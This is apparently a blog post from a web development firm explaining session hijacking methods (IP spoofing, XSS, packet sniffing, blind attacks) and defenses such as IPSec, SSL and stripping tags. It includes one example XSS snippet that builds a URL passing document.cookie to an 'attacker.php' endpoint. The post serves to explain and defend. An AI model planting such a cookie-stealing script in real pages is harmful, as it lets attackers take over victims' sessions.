M/s VIKASH TECH - We Write Imaginations to Codes..!!

Session Hijacking

Session Hijacking

While working with codes, the biggest issues which comes in picture is the security. There are multiple ways to secure your code from known threats, one on them is session hijacking.

What is session hijacking?

Well, session hijacking, in simple words can be understood as someone else showing your ID card to enter inside your premises.

Every time, when a client connects with server, s/he is provided with a unique session ID. This session ID is used for all the communications between the user and server.

Session hijacking is a TCP security attack on user session over a network. This is generally called as man-in-middle attack, as someone sitting between the client and server looks for the session details and then presents herself / himself as the client to the server.

There are a few common methods of session hijacking

  • IP spoofing
  • Cross site scripting
  • Packet sniffing
  • Bind attack

IP Spoofing

Spoofing simply means pretending to be someone else. This is a technique used to gain unauthorized access to the computer with an IP address of a trusted host. In implementing this technique, attacker has to obtain the IP address of the client and inject his own packets spoofed with the IP address of client into the TCP session, so as to fool the server that it is communicating with the victim i.e. the original host.

Cross site scripting (XSS)

Attacker can also capture victim’s Session ID using XSS attack by using JavaScript. If an attacker sends a crafted link to the victim with the malicious JavaScript, when the victim clicks on the link, the JavaScript will run and completes the instructions made by the attacker.

 <SCRIPT type="text/javascript"> 
var adr = '../attacker.php?victim_cookie=' + escape(document.cookie);
</SCRIPT>

Packet sniffing

Packet sniffing is a way of session hijacking similar to IP spoofing. In this an attacker sniffs into the network and finds a way to get the session ID packets between a user and server. Once the session details is retrieve by the attacker, s/he hits the server with the same session details and pretends to be the actual client.

This can be done using tools like packet sniffer.

Attacker Sniffing for Session ID
Attacker using session ID to gain access

In the above figure, it can be seen that attack captures the victim’s session ID to gain access to the server by using some packet sniffers.

Blind Attack

If attacker is not able to sniff packets and guess the correct sequence number expected by server, brute force combinations of sequence number can be tried.

Security

To defend a network with session hijacking, a defender has to implement both security measures at Application level and Network level. Network level hijacks can be prevented by Ciphering the packets so that the hijacker cannot decipher the packet headers, to obtain any information which will aid in spoofing. This encryption can be provided by using protocols such as IPSec, SSL, SSH etc. Internet security protocol (IPSec) has the ability to encrypt the packet on some shared key between the two parties involved in communication. IPsec runs in two modes: Transport and Tunnel.
In Transport Mode only the data sent in the packet is encrypted while in Tunnel Mode both packet headers and data are encrypted, so it is more restrictive.

Session hijacking is a serious threat to Networks and Web applications on web as most of the systems are vulnerable to it.

At Network Level – You can implement SSL for allowing users to access website with https. You can add firewalls and add rules to secure you from attacks. The firewalls will also help you create tunnel for data transfer. You can use VPN for more secure network.

At Application Level – You can implement single session concept, this will ensure only a single session ID, that to from a single IP is accessing the server. You can reset sessions in a fixed interval of time and can encrypt all the data before sending it to client. Also, to prevent Cross site scripting(XSS), you can strip tags, can use X-XSS-Protection Header in your code, and multiple other options are there.

You can understand how to secure your network here

Category :

Comments

No comments found.

Leave a Comment

Latest Posts

PHP Security

Website Security - PHP: Implementing Security To Your Website

Security is one of the major concerns today and when it comes to coding, It becomes a point to re-think…

Total blocking time

Total Blocking Time (TBT): How it affects your website?

It's great to create a website and move your business online. Almost everyone does the same but there are certain…

Common variations of the websites

Common variations of the website, choose which suits you the best.

There are lots of options for creating websites, here we are going to share you some common types of websites…

E-Commerce - Want to sell online?

E-Commerce : Want to sell online?

It is always a good idea to move your business with the latest trend. Today, when the entire world is…

Tags